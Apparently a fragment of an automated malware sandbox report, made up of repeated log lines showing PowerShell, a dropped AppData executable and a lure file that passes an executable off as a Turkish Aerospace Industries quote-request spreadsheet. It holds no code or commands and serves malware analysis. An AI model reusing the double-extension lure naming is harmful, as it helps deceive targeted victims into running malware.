Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
